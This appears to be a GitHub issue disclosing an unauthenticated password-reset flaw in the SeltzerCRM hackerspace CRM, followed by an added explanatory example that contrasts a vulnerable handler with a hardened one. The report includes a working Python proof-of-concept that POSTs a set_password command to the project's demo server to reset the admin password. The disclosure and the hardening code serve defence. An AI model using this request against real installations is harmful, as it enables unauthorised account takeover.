elplatt / seltzer

CRM for hackerspaces
GNU General Public License v3.0

Unauthenticated user can change admin/any password!! #409

Closed altinukshini closed 6 years ago

altinukshini commented 6 years ago

cid is still not handled well since this issue (https://github.com/elplatt/seltzer/issues/241). An authenticated user visiting a URL with a string cid param can show a lot of unwanted data: http://demo.seltzercrm.org/?q=contact&cid=j or http://demo.seltzercrm.org/?q=contact&cid="2"

I'd like to credit a young kid at our hackerspace for figuring this out and breaking our CRM :D. Unauthorized/unauthenticated users can change the admin's (or any) password by making a POST request to http://demo.seltzercrm.org/?q=contact&cid=1 with data: {'cid': 1, 'command': 'set_password', 'password': 'lol123', 'confirm': 'lol123', 'submitted':'Change+password'}

You can try this simple Python script:

```python
import requests

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0',
    'Accept': 'application/json, text/javascript, */*; q=0.01',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With': 'XMLHttpRequest'
}

# No login step: the request goes out from a fresh, unauthenticated session
session = requests.Session()

content = session.post(
    "http://demo.seltzercrm.org/index.php?q=contact&cid=1",
    data={'cid': 1, 'command': 'set_password', 'password': 'helloworld',
          'confirm': 'helloworld', 'submitted': 'Change+password'},
    headers=headers,
)

print(content.status_code)
```
elplatt commented 6 years ago

Thanks for finding this! Can you give any more information on how this works? Is there a missing permissions check or is this somehow injecting data into the php $_SESSION variable?

Also, which hackerspace are you from? Hi!

On Tue, Feb 27, 2018 at 9:10 PM, Altin Ukshini notifications@github.com wrote:

-- Edward L. Platt https://elplatt.com | @elplatt | elplatt@social.coop
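The report describes two separate defects: a `cid` parameter that is never validated (so `cid=j` or `cid="2"` reach the query layer), and a `set_password` command that is executed without checking who is logged in or whether they may change that contact's password. The following is an added example, not SeltzerCRM's own code, that models both defects beside a hardened handler so the missing permissions check elplatt asks about is concrete. Every name in it (`Contact`, `Session`, `parse_cid`, `set_password_vulnerable`, `set_password_hardened`, `make_db`, `demo`) is hypothetical, and the sample contacts are constructed; only the POST body mirrors the report.

```python
"""Added example (not SeltzerCRM code): a toy contact store and two versions of
the set_password command handler, one mirroring the reported bug and one with
authentication, cid validation and an authorisation check. Names are hypothetical."""
import hashlib
import hmac
import os
import re
from dataclasses import dataclass
from typing import Dict, Optional

_CID_RE = re.compile(r"^[1-9][0-9]*$")  # canonical positive integer only


@dataclass
class Contact:
    cid: int
    is_admin: bool
    salt: bytes = b""
    pw_hash: bytes = b""


@dataclass
class Session:
    user_cid: Optional[int]  # None models an unauthenticated visitor


def hash_password(password: str, salt: Optional[bytes] = None):
    """PBKDF2-HMAC-SHA256 with a per-user salt; returns (salt, hash)."""
    salt = os.urandom(16) if salt is None else salt
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def check_password(contact: Contact, password: str) -> bool:
    _, h = hash_password(password, contact.salt)
    return hmac.compare_digest(h, contact.pw_hash)


def parse_cid(raw) -> Optional[int]:
    """Reject cid=j, cid="2", cid=007: anything but a canonical positive int."""
    if not isinstance(raw, str) or not _CID_RE.match(raw):
        return None
    return int(raw)


def set_password_vulnerable(db: Dict[int, Contact], params: dict) -> int:
    """Mirrors the report: nothing checks who is logged in or whose cid this is."""
    cid = int(params["cid"])
    if params["password"] != params["confirm"]:
        return 400
    db[cid].salt, db[cid].pw_hash = hash_password(params["password"])
    return 200


def set_password_hardened(db: Dict[int, Contact], session: Session, params: dict) -> int:
    """Authenticate, validate cid, then authorise: only self or an admin."""
    if session.user_cid is None or session.user_cid not in db:
        return 401  # unauthenticated: the report's request stops here
    cid = parse_cid(params.get("cid"))
    if cid is None or cid not in db:
        return 400  # cid=j and cid="2" are rejected before any lookup
    actor = db[session.user_cid]
    if cid != session.user_cid and not actor.is_admin:
        return 403  # a member may not change another contact's password
    password = params.get("password", "")
    if not password or password != params.get("confirm"):
        return 400
    db[cid].salt, db[cid].pw_hash = hash_password(password)
    return 200


def make_db() -> Dict[int, Contact]:
    """Constructed sample data: cid 1 is the admin, cid 2 an ordinary member."""
    db = {1: Contact(1, True), 2: Contact(2, False)}
    for contact, pw in ((db[1], "admin-original"), (db[2], "member-original")):
        contact.salt, contact.pw_hash = hash_password(pw)
    return db


def demo() -> dict:
    """Replays the report's POST body, unauthenticated, against both handlers.

    Returns {"vulnerable": (status, admin password now 'lol123'?),
             "hardened":   (status, admin password still the original?)}.
    """
    body = {"cid": "1", "command": "set_password", "password": "lol123",
            "confirm": "lol123", "submitted": "Change password"}
    anon = Session(user_cid=None)
    db_v = make_db()
    v_status = set_password_vulnerable(db_v, body)
    db_h = make_db()
    h_status = set_password_hardened(db_h, anon, body)
    return {
        "vulnerable": (v_status, check_password(db_v[1], "lol123")),
        "hardened": (h_status, check_password(db_h[1], "admin-original")),
    }


if __name__ == "__main__":
    print(demo())
```

The ordering in `set_password_hardened` is deliberate: authentication first, input validation second, and the self-or-admin authorisation check before any write, so that none of the three reported behaviours (anonymous password change, cross-account change, string cid) reaches the database. Validating `cid` against a canonical integer pattern rather than casting it also closes the `cid=j` / `cid="2"` information leak from issue #241.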